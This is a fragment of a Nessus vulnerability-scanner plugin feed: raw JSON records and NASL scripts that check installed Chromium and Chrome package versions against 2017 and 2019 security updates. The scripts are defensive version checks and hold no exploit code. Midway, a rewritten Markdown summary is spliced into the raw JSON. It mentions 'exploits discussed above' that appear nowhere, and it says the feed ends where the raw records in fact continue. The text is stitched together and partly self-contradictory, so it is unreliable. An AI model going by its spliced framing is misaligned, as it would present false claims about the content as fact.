EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100646);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n 
\"CVE-2017-5086\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (52f4b48b-4ac3-11e7-99aa-e8e0b747a45a)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Google Chrome releases reports :\n\n30 security fixes in this release\n\nPlease reference CVE/URL list for details\");\n # https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dde93a4\");\n # https://vuxml.freebsd.org/freebsd/52f4b48b-4ac3-11e7-99aa-e8e0b747a45a.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8a682e0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<59.0.3071.86\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<59.0.3071.86\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:41:23", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 72.0.3626.81.\n\nSecurity Fix(es) :\n\n* chromium-browser: Inappropriate implementation in QUIC Networking (CVE-2019-5754)\n\n* chromium-browser: Inappropriate implementation in V8 (CVE-2019-5755)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5756)\n\n* chromium-browser: Type Confusion in SVG (CVE-2019-5757)\n\n* chromium-browser: Use after free in Blink (CVE-2019-5758)\n\n* chromium-browser: Use after free in HTML select elements (CVE-2019-5759)\n\n* chromium-browser: Use after free in WebRTC (CVE-2019-5760)\n\n* chromium-browser: Use after free in SwiftShader (CVE-2019-5761)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5762)\n\n* chromium-browser: Insufficient validation of untrusted input in V8 (CVE-2019-5763)\n\n* chromium-browser: Use after free in WebRTC (CVE-2019-5764)\n\n* chromium-browser: Insufficient policy enforcement in the browser (CVE-2019-5765)\n\n* chromium-browser: Inappropriate implementation in V8 (CVE-2019-5782)\n\n* chromium-browser: Insufficient policy enforcement in Canvas (CVE-2019-5766)\n\n* chromium-browser: Incorrect security UI in WebAPKs (CVE-2019-5767)\n\n* chromium-browser: Insufficient policy enforcement in DevTools (CVE-2019-5768)\n\n* chromium-browser: Insufficient validation of untrusted input in Blink (CVE-2019-5769)\n\n* chromium-browser: Heap buffer overflow in WebGL (CVE-2019-5770)\n\n* chromium-browser: Heap buffer overflow in SwiftShader (CVE-2019-5771)\n\n* chromium-browser: Use after free in PDFium (CVE-2019-5772)\n\n* chromium-browser: Insufficient data validation in IndexedDB (CVE-2019-5773)\n\n* chromium-browser: Insufficient validation of untrusted input in SafeBrowsing (CVE-2019-5774)\n\n* 
### Appended Nessus plugin records: Chrome 72.0.3626.x security update

What follows is a fragment of a machine-readable Nessus plugin feed that was appended to the page. It is unrelated to the exploits discussed above; the first record begins mid-description and the last is cut off inside its CVE list. The records are rendered here in readable form. All five plugins cover the same Chrome stable-channel update (72.0.3626.81 of 2019-01-29, plus the 72.0.3626.96 follow-up shipped by openSUSE), carry the same scores, and are local, version-based checks: none of them attempts to exploit anything, and the Google Chrome plugins rely solely on the application's self-reported version number.

Common fields

* CVSS v3.0: 9.6 (Critical), vector CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H (score source CVE-2019-5759)
* CVSS v2: 6.8 (Medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P (score source CVE-2019-5782)
* Exploitability: "No known exploits are available"
* Solution: update the affected chromium / chromium-browser packages, or upgrade Google Chrome to 72.0.3626.81 or later

Security fixes listed in the records (wording as quoted by Red Hat and SUSE from the Chrome release notes)

* CVE-2019-5754: Inappropriate implementation in QUIC Networking
* CVE-2019-5755, CVE-2019-5782, CVE-2019-5784: Inappropriate implementation in V8 (CVE-2019-5784 appears only in the 72.0.3626.96 openSUSE records)
* CVE-2019-5763: Insufficient validation of untrusted input in V8
* CVE-2019-5756, CVE-2019-5762, CVE-2019-5772: Use after free in PDFium
* CVE-2019-5757: Type Confusion in SVG
* CVE-2019-5758: Use after free in Blink
* CVE-2019-5759: Use after free in HTML select elements
* CVE-2019-5760, CVE-2019-5764: Use after free in WebRTC
* CVE-2019-5761: Use after free in SwiftShader
* CVE-2019-5771: Heap buffer overflow in SwiftShader
* CVE-2019-5770: Heap buffer overflow in WebGL
* CVE-2019-5765: Insufficient policy enforcement in the browser
* CVE-2019-5766: Insufficient policy enforcement in Canvas
* CVE-2019-5767: Incorrect security UI in WebAPKs
* CVE-2019-5768: Insufficient policy enforcement in DevTools
* CVE-2019-5769: Insufficient validation of untrusted input in Blink
* CVE-2019-5773: Insufficient data validation in IndexedDB
* CVE-2019-5774: Insufficient validation of untrusted input in SafeBrowsing
* CVE-2019-5775, CVE-2019-5776, CVE-2019-5777, CVE-2019-5781: Insufficient policy enforcement in Omnibox
* CVE-2019-5778: Insufficient policy enforcement in Extensions
* CVE-2019-5779: Insufficient policy enforcement in ServiceWorker
* CVE-2019-5780: Insufficient policy enforcement

The two Google Chrome plugins additionally carry CVE-2019-13684 in their CVE lists without a description.

**RHEL 6 : chromium-browser (RHSA-2019:0309)**, Nessus plugin 122112 (REDHAT-RHSA-2019-0309.NASL, script version 1.8), https://www.tenable.com/plugins/nessus/122112. Published 2019-02-12, last modified 2022-05-23; patch published 2019-02-11. Red Hat rates the update Critical; it brings chromium-browser on Red Hat Enterprise Linux 6 Supplementary to 72.0.3626.81. CPEs: p-cpe:/a:redhat:enterprise_linux:chromium-browser, p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo, cpe:/o:redhat:enterprise_linux:6. References: https://access.redhat.com/errata/RHSA-2019:0309 and https://access.redhat.com/security/cve/cve-2019-5754 through cve-2019-5782. Check performed: requires local checks over SSH, a "Red Hat Enterprise Linux ... release 6" string and an x86_64, i386 to i686 or s390 CPU. If yum updateinfo data is available the plugin reports on whether RHSA-2019:0309 is applied; otherwise it runs rpm_check against chromium-browser-72.0.3626.81-1.el6_10 and chromium-browser-debuginfo-72.0.3626.81-1.el6_10 on i686 and x86_64 (allowmaj:TRUE) and raises SECURITY_WARNING if an older package is installed.

**openSUSE Security Update : chromium (openSUSE-2019-205)**, plugin 122305 (OPENSUSE-2019-205.NASL, script version 1.5), https://www.tenable.com/plugins/nessus/122305. Published 2019-02-19, last modified 2021-01-19; patch published 2019-02-18. Updates Chromium to 72.0.3626.96 (bsc#1123641, bsc#1124936) and adds CVE-2019-5784. CPEs: p-cpe:/a:novell:opensuse:chromedriver, chromedriver-debuginfo, chromium, chromium-debuginfo, chromium-debugsource, cpe:/o:novell:opensuse:42.3. References: https://bugzilla.opensuse.org/show_bug.cgi?id=1123641, https://bugzilla.opensuse.org/show_bug.cgi?id=1124936, https://chromereleases.googleblog.com/2019/02/stable-channel-update-for-desktop.html. Check performed: release must match SUSE42.3 on x86_64; rpm_check against chromedriver-72.0.3626.96-197.1, chromedriver-debuginfo-72.0.3626.96-197.1, chromium-72.0.3626.96-197.1, chromium-debuginfo-72.0.3626.96-197.1 and chromium-debugsource-72.0.3626.96-197.1. Note that this plugin's source sets its CVSS v3 base vector with scope S:U, whereas the record metadata carries the S:C vector given above.

**Google Chrome < 72.0.3626.81 Multiple Vulnerabilities (macOS)**, plugin 121513 (MACOSX_GOOGLE_CHROME_72_0_3626_81.NASL, script version 1.6), https://www.tenable.com/plugins/nessus/121513. Published 2019-01-31, last modified 2022-05-24; vulnerability and patch published 2019-01-29; BID 106767. CPE cpe:/a:google:chrome. Reference: https://chromereleases.googleblog.com/2019/01/stable-channel-update-for-desktop.html. Check performed: depends on macosx_google_chrome_installed.nbin and calls google_chrome_check_version(fix:'72.0.3626.81', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE).

**Google Chrome < 72.0.3626.81 Multiple Vulnerabilities (Windows)**, plugin 121514 (GOOGLE_CHROME_72_0_3626_81.NASL, script version 1.7), https://www.tenable.com/plugins/nessus/121514. Same dates, CVE list, reference and solution as the macOS plugin; thorough_tests is set. Check performed: depends on google_chrome_installed.nasl, enumerates installations from the SMB/Google_Chrome/* KB keys and calls google_chrome_check_version(installs:installs, fix:'72.0.3626.81', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE).

**openSUSE Security Update : chromium (openSUSE-2019-204)**, published 2019-02-19, with the same description and scores as openSUSE-2019-205 (Chromium 72.0.3626.96, bsc#1123641 and bsc#1124936). The record is cut off in its CVE list after CVE-2019-5763.
"CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-204.NASL", "href": "https://www.tenable.com/plugins/nessus/122304", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-204.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122304);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-204)\");\n script_summary(english:\"Check for the openSUSE-2019-204 patch\");\n\n script_set_attribute(\n 
attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for Chromium to version 72.0.3626.96 fixes the following\nissues :\n\nSecurity issues fixed (bsc#1123641 and bsc#1124936) :\n\n - CVE-2019-5784: Inappropriate implementation in V8 \n\n - CVE-2019-5754: Inappropriate implementation in QUIC\n Networking.\n\n - CVE-2019-5782: Inappropriate implementation in V8. \n\n - CVE-2019-5755: Inappropriate implementation in V8. \n\n - CVE-2019-5756: Use after free in PDFium. \n\n - CVE-2019-5757: Type Confusion in SVG.\n\n - CVE-2019-5758: Use after free in Blink.\n\n - CVE-2019-5759: Use after free in HTML select elements.\n\n - CVE-2019-5760: Use after free in WebRTC. \n\n - CVE-2019-5761: Use after free in SwiftShader.\n\n - CVE-2019-5762: Use after free in PDFium. \n\n - CVE-2019-5763: Insufficient validation of untrusted\n input in V8.\n\n - CVE-2019-5764: Use after free in WebRTC. \n\n - CVE-2019-5765: Insufficient policy enforcement in the\n browser.\n\n - CVE-2019-5766: Insufficient policy enforcement in\n Canvas.\n\n - CVE-2019-5767: Incorrect security UI in WebAPKs. \n\n - CVE-2019-5768: Insufficient policy enforcement in\n DevTools. \n\n - CVE-2019-5769: Insufficient validation of untrusted\n input in Blink.\n\n - CVE-2019-5770: Heap buffer overflow in WebGL. \n\n - CVE-2019-5771: Heap buffer overflow in SwiftShader.\n\n - CVE-2019-5772: Use after free in PDFium. \n\n - CVE-2019-5773: Insufficient data validation in\n IndexedDB.\n\n - CVE-2019-5774: Insufficient validation of untrusted\n input in SafeBrowsing. \n\n - CVE-2019-5775: Insufficient policy enforcement in\n Omnibox. \n\n - CVE-2019-5776: Insufficient policy enforcement in\n Omnibox. \n\n - CVE-2019-5777: Insufficient policy enforcement in\n Omnibox. 
\n\n - CVE-2019-5778: Insufficient policy enforcement in\n Extensions.\n\n - CVE-2019-5779: Insufficient policy enforcement in\n ServiceWorker.\n\n - CVE-2019-5780: Insufficient policy enforcement. \n\n - CVE-2019-5781: Insufficient policy enforcement in\n Omnibox.\n\nFor a full list of changes refer to\nhttps://chromereleases.googleblog.com/2019/02/stable-channel-update-fo\nr-desktop.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1124936\"\n );\n # https://chromereleases.googleblog.com/2019/02/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?861498a3\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5782\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-72.0.3626.96-lp150.2.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-72.0.3626.96-lp150.2.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-72.0.3626.96-lp150.2.41.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-72.0.3626.96-lp150.2.41.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", 
reference:\"chromium-debugsource-72.0.3626.96-lp150.2.41.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:41:22", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2018-17481 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2019-5754 Klzgrad discovered an error in the QUIC networking implementation.\n\n - CVE-2019-5755 Jay Bosamiya discovered an implementation error in the v8 JavaScript library.\n\n - CVE-2019-5756 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2019-5757 Alexandru Pitis discovered a type confusion error in the SVG image format implementation.\n\n - CVE-2019-5758 Zhe Jin discovered a use-after-free issue in blink/webkit.\n\n - CVE-2019-5759 Almog Benin discovered a use-after-free issue when handling HTML pages containing select elements.\n\n - CVE-2019-5760 Zhe Jin discovered a use-after-free issue in the WebRTC implementation.\n\n - CVE-2019-5762 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2019-5763 Guang Gon discovered an input validation error in the v8 JavaScript library.\n\n - CVE-2019-5764 Eyal Itkin discovered a use-after-free issue in the WebRTC implementation.\n\n - CVE-2019-5765 Sergey Toshin discovered a policy enforcement error.\n\n - CVE-2019-5766 David Erceg discovered a policy enforcement error.\n\n - CVE-2019-5767 Haoran Lu, Yifan Zhang, Luyi Xing, and Xiaojing Liao reported an error in the WebAPKs user interface.\n\n - CVE-2019-5768 Rob Wu discovered a policy enforcement error in the developer tools.\n\n - 
CVE-2019-5769 Guy Eshel discovered an input validation error in blink/webkit.\n\n - CVE-2019-5770 hemidallt discovered a buffer overflow issue in the WebGL implementation.\n\n - CVE-2019-5772 Zhen Zhou discovered a use-after-free issue in the pdfium library.\n\n - CVE-2019-5773 Yongke Wong discovered an input validation error in the IndexDB implementation.\n\n - CVE-2019-5774 Junghwan Kang and Juno Im discovered an input validation error in the SafeBrowsing implementation.\n\n - CVE-2019-5775 evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5776 Lnyas Zhang discovered a policy enforcement error.\n\n - CVE-2019-5777 Khalil Zhani discovered a policy enforcement error.\n\n - CVE-2019-5778 David Erceg discovered a policy enforcement error in the Extensions implementation.\n\n - CVE-2019-5779 David Erceg discovered a policy enforcement error in the ServiceWorker implementation.\n\n - CVE-2019-5780 Andreas Hegenberg discovered a policy enforcement error.\n\n - CVE-2019-5781 evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5782 Qixun Zhao discovered an implementation error in the v8 JavaScript library.\n\n - CVE-2019-5783 Shintaro Kobori discovered an input validation error in the developer tools.\n\n - CVE-2019-5784 Lucas Pinheiro discovered an implementation error in the v8 JavaScript library.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-02-19T00:00:00", "type": "nessus", "title": "Debian DSA-4395-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17481", "CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5783", "CVE-2019-5784"], "modified": "2022-05-24T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4395.NASL", "href": "https://www.tenable.com/plugins/nessus/122272", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4395. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122272);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\"CVE-2018-17481\", \"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5783\", \"CVE-2019-5784\");\n script_xref(name:\"DSA\", value:\"4395\");\n\n script_name(english:\"Debian DSA-4395-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2018-17481\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2019-5754\n Klzgrad discovered an error in the QUIC networking\n implementation.\n\n - CVE-2019-5755\n Jay Bosamiya discovered an implementation error in the\n v8 JavaScript library.\n\n - CVE-2019-5756\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2019-5757\n Alexandru Pitis discovered a type confusion error in the\n SVG image format implementation.\n\n - CVE-2019-5758\n Zhe Jin discovered a use-after-free issue in\n blink/webkit.\n\n - CVE-2019-5759\n Almog Benin discovered a use-after-free issue when\n handling HTML pages containing select 
elements.\n\n - CVE-2019-5760\n Zhe Jin discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2019-5762\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2019-5763\n Guang Gon discovered an input validation error in the v8\n JavaScript library.\n\n - CVE-2019-5764\n Eyal Itkin discovered a use-after-free issue in the\n WebRTC implementation.\n\n - CVE-2019-5765\n Sergey Toshin discovered a policy enforcement error.\n\n - CVE-2019-5766\n David Erceg discovered a policy enforcement error.\n\n - CVE-2019-5767\n Haoran Lu, Yifan Zhang, Luyi Xing, and Xiaojing Liao\n reported an error in the WebAPKs user interface.\n\n - CVE-2019-5768\n Rob Wu discovered a policy enforcement error in the\n developer tools.\n\n - CVE-2019-5769\n Guy Eshel discovered an input validation error in\n blink/webkit.\n\n - CVE-2019-5770\n hemidallt discovered a buffer overflow issue in the\n WebGL implementation.\n\n - CVE-2019-5772\n Zhen Zhou discovered a use-after-free issue in the\n pdfium library.\n\n - CVE-2019-5773\n Yongke Wong discovered an input validation error in the\n IndexDB implementation.\n\n - CVE-2019-5774\n Junghwan Kang and Juno Im discovered an input validation\n error in the SafeBrowsing implementation.\n\n - CVE-2019-5775\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5776\n Lnyas Zhang discovered a policy enforcement error.\n\n - CVE-2019-5777\n Khalil Zhani discovered a policy enforcement error.\n\n - CVE-2019-5778\n David Erceg discovered a policy enforcement error in the\n Extensions implementation.\n\n - CVE-2019-5779\n David Erceg discovered a policy enforcement error in the\n ServiceWorker implementation.\n\n - CVE-2019-5780\n Andreas Hegenberg discovered a policy enforcement error.\n\n - CVE-2019-5781\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5782\n Qixun Zhao discovered an implementation error in the v8\n JavaScript library.\n\n - CVE-2019-5783\n Shintaro Kobori discovered an 
